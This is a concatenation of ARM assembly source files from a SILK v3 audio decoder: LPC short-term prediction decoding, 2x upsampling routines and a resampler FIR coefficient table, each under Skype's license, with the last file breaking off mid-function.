open-vela/external_silk-v3-decoder | 10,005 | silk/src/SKP_Silk_decode_core_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#include "SKP_Silk_AsmPreproc.h"
#define MAX_LPC_ORDER 16
#define MAX_LPC_ORDER_INT32_OFFSET 64
#if EMBEDDED_ARM >= 5
VARDEF ptr_vec_Q10, r0
VARDEF ptr_pres_Q10, r1
VARDEF ptr_sLPC_Q14, r2
VARDEF ptr_A_Q12_tmp, r3
VARDEF ptr_LPC_Q14, r4
VARDEF val1_LPC_Q14, r5
VARDEF val_pres_Q10, r5
VARDEF val2_LPC_Q14, r6
VARDEF val_vec_Q10, r6
VARDEF val3_LPC_Q14, r8
VARDEF val4_LPC_Q14, sb
VARDEF val1_Atmp, sl
VARDEF val_LPC_Q14, sl
VARDEF val2_Atmp, ip
VARDEF val_subfr_length, _r7
VARDEF val_LPC_order, lr
VARDEF val_LPC_pred_Q10, lr
.globl SYM(SKP_Silk_decode_short_term_prediction)
SYM(SKP_Silk_decode_short_term_prediction):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
.set ptr_LPC_order, 40
.set ptr_subfr_length, 44
ldr val_LPC_order, [sp, #ptr_LPC_order]
ldr val_subfr_length, [sp, #ptr_subfr_length]
ands val1_Atmp, ptr_A_Q12_tmp, #3
add ptr_sLPC_Q14, ptr_sLPC_Q14, #MAX_LPC_ORDER_INT32_OFFSET
bne LR(2, f)
cmp val_LPC_order, #16
bne LR(1, f)
/*LPC_order == 16*/
L(0)
mov ptr_LPC_Q14, ptr_sLPC_Q14
ldmia ptr_A_Q12_tmp!, {val1_Atmp, val2_Atmp}
ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
smulwb val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp
smlawt val_LPC_pred_Q10, val1_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
ldr val1_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
smlawt val_LPC_pred_Q10, val3_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
ldr val2_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
smlawt val_LPC_pred_Q10, val1_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
ldr val1_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
smlawt val_LPC_pred_Q10, val3_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
ldr val2_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
smlawt val_LPC_pred_Q10, val1_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
ldr val1_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
smlawt val_LPC_pred_Q10, val3_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
ldr val2_Atmp, [ptr_A_Q12_tmp], #-28
smlawb val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
smlawt val_LPC_pred_Q10, val1_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldr val_pres_Q10, [ptr_pres_Q10], #4
smlawb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
smlawt val_LPC_pred_Q10, val3_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
subs val_subfr_length, val_subfr_length, #1
add val_vec_Q10, val_LPC_pred_Q10, val_pres_Q10
mov val_LPC_Q14, val_vec_Q10, lsl #4
str val_vec_Q10, [ptr_vec_Q10], #4
str val_LPC_Q14, [ptr_sLPC_Q14], #4
bgt LR(0, b)
ldmia sp!, {r4-r10, fp, ip, pc}
/*LPC_order == 10*/
L(1)
mov ptr_LPC_Q14, ptr_sLPC_Q14
ldr val2_Atmp, [ptr_A_Q12_tmp], #4
ldr val1_Atmp, [ptr_A_Q12_tmp], #4
ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
smulwb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp
smlawt val_LPC_pred_Q10, val3_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
ldr val2_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
smlawt val_LPC_pred_Q10, val1_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
ldr val1_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
smlawt val_LPC_pred_Q10, val3_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
ldr val2_Atmp, [ptr_A_Q12_tmp], #-16
smlawb val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
smlawt val_LPC_pred_Q10, val1_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldr val_pres_Q10, [ptr_pres_Q10], #4
smlawb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
smlawt val_LPC_pred_Q10, val3_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
subs val_subfr_length, val_subfr_length, #1
add val_vec_Q10, val_LPC_pred_Q10, val_pres_Q10
mov val_LPC_Q14, val_vec_Q10, lsl #4
str val_vec_Q10, [ptr_vec_Q10], #4
str val_LPC_Q14, [ptr_sLPC_Q14], #4
bgt LR(1, b)
ldmia sp!, {r4-r10, fp, ip, pc}
L(2)
cmp val_LPC_order, #16
bne LR(4, f)
/*LPC_order == 16*/
L(3)
mov ptr_LPC_Q14, ptr_sLPC_Q14
ldrh val1_Atmp, [ptr_A_Q12_tmp], #2
ldr val2_Atmp, [ptr_A_Q12_tmp], #4
ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
smulwb val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp
ldr val1_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val1_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
smlawt val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldr val2_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val3_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
smlawt val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldr val1_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val1_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
smlawt val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldr val2_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val3_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
smlawt val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldr val1_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val1_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
smlawt val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldr val2_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val3_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
smlawt val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldrh val1_Atmp, [ptr_A_Q12_tmp], #-30
smlawb val_LPC_pred_Q10, val1_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldr val_pres_Q10, [ptr_pres_Q10], #4
smlawt val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
smlawb val_LPC_pred_Q10, val3_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
subs val_subfr_length, val_subfr_length, #1
add val_vec_Q10, val_LPC_pred_Q10, val_pres_Q10
mov val_LPC_Q14, val_vec_Q10, lsl #4
str val_vec_Q10, [ptr_vec_Q10], #4
str val_LPC_Q14, [ptr_sLPC_Q14], #4
bgt LR(3, b)
ldmia sp!, {r4-r10, fp, ip, pc}
/*LPC_order == 10*/
L(4)
mov ptr_LPC_Q14, ptr_sLPC_Q14
ldrh val2_Atmp, [ptr_A_Q12_tmp], #2
ldr val1_Atmp, [ptr_A_Q12_tmp], #4
ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
smulwb val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp
ldr val2_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val3_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
smlawt val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldr val1_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val1_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val1_LPC_Q14, val2_LPC_Q14}
smlawt val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldr val2_Atmp, [ptr_A_Q12_tmp], #4
smlawb val_LPC_pred_Q10, val3_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldmdb ptr_LPC_Q14!, {val3_LPC_Q14, val4_LPC_Q14}
smlawt val_LPC_pred_Q10, val2_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
ldr val1_Atmp, [ptr_A_Q12_tmp], #-18
smlawb val_LPC_pred_Q10, val1_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
ldr val_pres_Q10, [ptr_pres_Q10], #4
smlawt val_LPC_pred_Q10, val4_LPC_Q14, val2_Atmp, val_LPC_pred_Q10
smlawb val_LPC_pred_Q10, val3_LPC_Q14, val1_Atmp, val_LPC_pred_Q10
subs val_subfr_length, val_subfr_length, #1
add val_vec_Q10, val_LPC_pred_Q10, val_pres_Q10
mov val_LPC_Q14, val_vec_Q10, lsl #4
str val_vec_Q10, [ptr_vec_Q10], #4
str val_LPC_Q14, [ptr_sLPC_Q14], #4
bgt LR(4, b)
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
|
open-vela/external_silk-v3-decoder | 3,468 | silk/src/SKP_Silk_resampler_up2_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
#define SKP_Silk_resampler_up2_lq_0 0x1FA6
#define SKP_Silk_resampler_up2_lq_1 0x8FAF
VARDEF xy0, r4
VARDEF xy1, r5
VARDEF up2_coefs, _r7
VARDEF S_0, r6
VARDEF S_1, r8
VARDEF in, sb
VARDEF out0, sl
VARDEF out1, r0
.set sp_S, 0
.globl SYM(SKP_Silk_resampler_up2)
SYM(SKP_Silk_resampler_up2):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #4
mov up2_coefs, #0x1F000000
ldrsh in, [r2], #2
add up2_coefs, up2_coefs, #0xA60000
str r0, [sp, #sp_S]
add up2_coefs, up2_coefs, #0x8F00
ldmia r0, {S_0, S_1}
add up2_coefs, up2_coefs, #0xAF
mov ip, #512
cmp r3, #0
beq LR(1, f)
L(0)
mov in, in, lsl #10
sub xy0, in, S_0
sub xy1, in, S_1
smulwt xy0, xy0, up2_coefs
smlawb xy1, xy1, up2_coefs, xy1
add out0, S_0, xy0
add out1, S_1, xy1
add S_0, in, xy0
add S_1, in, xy1
qadd out0, out0, ip
qadd out1, out1, ip
#if EMBEDDED_ARM<6
cmp out0, #0x2000000
movge out0, #0x2000000
subge out0, out0, #1
cmn out0, #0x2000000
movlt out0, #0x2000000
cmp out1, #0x2000000
movge out1, #0x2000000
subge out1 ,out1, #1
cmn out1, #0x2000000
movlt out1, #0x2000000
mov out0, out0, asr #10
mov out1, out1, asr #10
#else
ssat out0, #16, out0, asr #10
ssat out1, #16, out1, asr #10
#endif
subs r3, r3, #1
#ifdef _WINRT
ble LR(2, f)
ldrsh in, [r2], #2
strh out0, [r1], #2
strh out1, [r1], #2
b LR(0, b)
L(2)
strh out0, [r1], #2
strh out1, [r1], #2
#else
ldrgtsh in, [r2], #2
strh out0, [r1], #2
strh out1, [r1], #2
bgt LR(0, b)
#endif
ldr r0, [sp, #sp_S]
stmia r0, {S_0, S_1}
L(1)
add sp, sp, #4
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 9,351 | silk/src/SKP_Silk_resampler_rom_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
EXPORT SYM(SKP_Silk_resampler_frac_FIR_144_alt)
/*DATA*/
ALIGN 4
SKP_TABLE SKP_Silk_resampler_frac_FIR_144_alt, 2
DCW -647, 1884, 30078, 2207, -851, 73, \
-625, 1736, 30044, 2409, -901, 81, \
-603, 1591, 30005, 2614, -952, 89, \
-581, 1448, 29963, 2820, -1003, 97, \
-559, 1308, 29917, 3028, -1054, 105, \
-537, 1169, 29867, 3238, -1105, 113, \
-515, 1032, 29813, 3450, -1156, 121, \
-494, 898, 29755, 3664, -1207, 129, \
-473, 766, 29693, 3880, -1258, 137, \
-452, 636, 29627, 4098, -1309, 145
DCW -431, 508, 29558, 4317, -1359, 152, \
-410, 383, 29484, 4538, -1410, 160, \
-390, 260, 29407, 4761, -1460, 168, \
-369, 139, 29327, 4986, -1511, 175, \
-349, 20, 29242, 5212, -1561, 183, \
-330, -97, 29154, 5439, -1611, 190, \
-310, -211, 29062, 5668, -1660, 197, \
-291, -324, 28967, 5899, -1709, 204, \
-271, -434, 28868, 6131, -1758, 212, \
-253, -542, 28765, 6364, -1807, 219
DCW -234, -647, 28659, 6599, -1856, 226, \
-215, -751, 28550, 6835, -1904, 232, \
-197, -852, 28436, 7072, -1951, 239, \
-179, -951, 28320, 7311, -1998, 246, \
-162, -1048, 28200, 7550, -2045, 252, \
-144, -1143, 28077, 7791, -2091, 259, \
-127, -1235, 27950, 8032, -2137, 265, \
-110, -1326, 27820, 8275, -2182, 271, \
-94, -1414, 27687, 8519, -2227, 277, \
-77, -1500, 27550, 8763, -2271, 283
DCW -61, -1584, 27410, 9009, -2315, 289, \
-45, -1665, 27268, 9255, -2358, 294, \
-30, -1745, 27122, 9502, -2400, 300, \
-15, -1822, 26972, 9750, -2442, 305, \
0, -1897, 26820, 9998, -2482, 310, \
15, -1970, 26665, 10247, -2523, 315, \
29, -2041, 26507, 10497, -2562, 320, \
44, -2110, 26346, 10747, -2601, 324, \
57, -2177, 26182, 10997, -2639, 328, \
71, -2242, 26015, 11248, -2676, 333
DCW 84, -2305, 25845, 11500, -2712, 337, \
97, -2365, 25673, 11751, -2747, 341, \
110, -2424, 25498, 12003, -2782, 344, \
122, -2480, 25320, 12255, -2815, 348, \
134, -2534, 25140, 12508, -2848, 351, \
146, -2587, 24956, 12760, -2880, 354, \
157, -2637, 24771, 13012, -2910, 357, \
168, -2685, 24583, 13265, -2940, 359, \
179, -2732, 24392, 13517, -2968, 362, \
190, -2776, 24199, 13770, -2996, 364
DCW 200, -2819, 24003, 14022, -3022, 366, \
210, -2859, 23805, 14274, -3048, 368, \
220, -2898, 23605, 14526, -3072, 369, \
229, -2934, 23403, 14777, -3095, 370, \
238, -2969, 23198, 15028, -3117, 371, \
247, -3002, 22992, 15279, -3138, 372, \
255, -3033, 22783, 15529, -3157, 373, \
263, -3062, 22572, 15779, -3175, 373, \
271, -3089, 22359, 16028, -3192, 373, \
279, -3114, 22144, 16277, -3208, 373
DCW 286, -3138, 21927, 16525, -3222, 372, \
293, -3160, 21709, 16772, -3235, 372, \
300, -3180, 21488, 17018, -3247, 371, \
306, -3198, 21266, 17264, -3257, 369, \
312, -3215, 21042, 17509, -3266, 368, \
318, -3229, 20816, 17753, -3273, 366, \
323, -3242, 20589, 17996, -3279, 364, \
328, -3254, 20360, 18238, -3283, 362, \
333, -3263, 20130, 18478, -3286, 359, \
338, -3272, 19898, 18718, -3288, 356
DCW 342, -3278, 19665, 18957, -3288, 353, \
346, -3283, 19430, 19194, -3286, 350, \
350, -3286, 19194, 19430, -3283, 346, \
353, -3288, 18957, 19665, -3278, 342, \
356, -3288, 18718, 19898, -3272, 338, \
359, -3286, 18478, 20130, -3263, 333, \
362, -3283, 18238, 20360, -3254, 328, \
364, -3279, 17996, 20589, -3242, 323, \
366, -3273, 17753, 20816, -3229, 318, \
368, -3266, 17509, 21042, -3215, 312
DCW 369, -3257, 17264, 21266, -3198, 306, \
371, -3247, 17018, 21488, -3180, 300, \
372, -3235, 16772, 21709, -3160, 293, \
372, -3222, 16525, 21927, -3138, 286, \
373, -3208, 16277, 22144, -3114, 279, \
373, -3192, 16028, 22359, -3089, 271, \
373, -3175, 15779, 22572, -3062, 263, \
373, -3157, 15529, 22783, -3033, 255, \
372, -3138, 15279, 22992, -3002, 247, \
371, -3117, 15028, 23198, -2969, 238
DCW 370, -3095, 14777, 23403, -2934, 229, \
369, -3072, 14526, 23605, -2898, 220, \
368, -3048, 14274, 23805, -2859, 210, \
366, -3022, 14022, 24003, -2819, 200, \
364, -2996, 13770, 24199, -2776, 190, \
362, -2968, 13517, 24392, -2732, 179, \
359, -2940, 13265, 24583, -2685, 168, \
357, -2910, 13012, 24771, -2637, 157, \
354, -2880, 12760, 24956, -2587, 146, \
351, -2848, 12508, 25140, -2534, 134
DCW 348, -2815, 12255, 25320, -2480, 122, \
344, -2782, 12003, 25498, -2424, 110, \
341, -2747, 11751, 25673, -2365, 97, \
337, -2712, 11500, 25845, -2305, 84, \
333, -2676, 11248, 26015, -2242, 71, \
328, -2639, 10997, 26182, -2177, 57, \
324, -2601, 10747, 26346, -2110, 44, \
320, -2562, 10497, 26507, -2041, 29, \
315, -2523, 10247, 26665, -1970, 15, \
310, -2482, 9998, 26820, -1897, 0
DCW 305, -2442, 9750, 26972, -1822, -15, \
300, -2400, 9502, 27122, -1745, -30, \
294, -2358, 9255, 27268, -1665, -45, \
289, -2315, 9009, 27410, -1584, -61, \
283, -2271, 8763, 27550, -1500, -77, \
277, -2227, 8519, 27687, -1414, -94, \
271, -2182, 8275, 27820, -1326, -110, \
265, -2137, 8032, 27950, -1235, -127, \
259, -2091, 7791, 28077, -1143, -144, \
252, -2045, 7550, 28200, -1048, -162
DCW 246, -1998, 7311, 28320, -951, -179, \
239, -1951, 7072, 28436, -852, -197, \
232, -1904, 6835, 28550, -751, -215, \
226, -1856, 6599, 28659, -647, -234, \
219, -1807, 6364, 28765, -542, -253, \
212, -1758, 6131, 28868, -434, -271, \
204, -1709, 5899, 28967, -324, -291, \
197, -1660, 5668, 29062, -211, -310, \
190, -1611, 5439, 29154, -97, -330, \
183, -1561, 5212, 29242, 20, -349
DCW 175, -1511, 4986, 29327, 139, -369, \
168, -1460, 4761, 29407, 260, -390, \
160, -1410, 4538, 29484, 383, -410, \
152, -1359, 4317, 29558, 508, -431, \
145, -1309, 4098, 29627, 636, -452, \
137, -1258, 3880, 29693, 766, -473, \
129, -1207, 3664, 29755, 898, -494, \
121, -1156, 3450, 29813, 1032, -515, \
113, -1105, 3238, 29867, 1169, -537, \
105, -1054, 3028, 29917, 1308, -559
DCW 97, -1003, 2820, 29963, 1448, -581, \
89, -952, 2614, 30005, 1591, -603, \
81, -901, 2409, 30044, 1736, -625, \
73, -851, 2207, 30078, 1884, -647
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 4,293 | silk/src/SKP_Silk_resampler_private_up2_HQ_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
VARDEF S_ptr, r0
VARDEF xy0, r4
VARDEF xy1, r5
VARDEF up2_coefs, r6
#ifdef IPHONE
VARDEF S_0, r8
VARDEF S_1, _r7
VARDEF S_2, r8
VARDEF S_3, _r7
VARDEF S_4, r8
VARDEF S_5, _r7
#else
VARDEF S_0, _r7
VARDEF S_1, r8
VARDEF S_2, _r7
VARDEF S_3, r8
VARDEF S_4, _r7
VARDEF S_5, r8
#endif
VARDEF in, sb
VARDEF out1, sl
VARDEF out2, ip
VARDEF out, lr
.globl SYM(SKP_Silk_resampler_private_up2_HQ)
SYM(SKP_Silk_resampler_private_up2_HQ):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
L(0)
ldrsh in, [r2], #2
ldmia S_ptr, {S_0, S_1}
ldr up2_coefs, SYM(resampler_up2_hq_0)
mov in, in, lsl #10
sub xy0, in, S_0
smulwb xy0, xy0, up2_coefs
add out1, S_0, xy0
sub xy1, out1, S_1
smlawt xy1, xy1, up2_coefs, xy1
add out2, S_1, xy1
add S_0, in, xy0
add S_1, out1, xy1
stmia S_ptr, {S_0, S_1}
add S_ptr, S_ptr, #16 // &S[4]
ldmia S_ptr, {S_4, S_5}
ldr xy1, SYM(resampler_up2_hq_notch_2)
ldr xy0, SYM(resampler_up2_hq_notch_1)
ldr up2_coefs, SYM(resampler_up2_hq_1)
sub S_ptr, S_ptr, #8 // &S[2]
mov out, #256
smlawb out2, S_5, xy1, out2
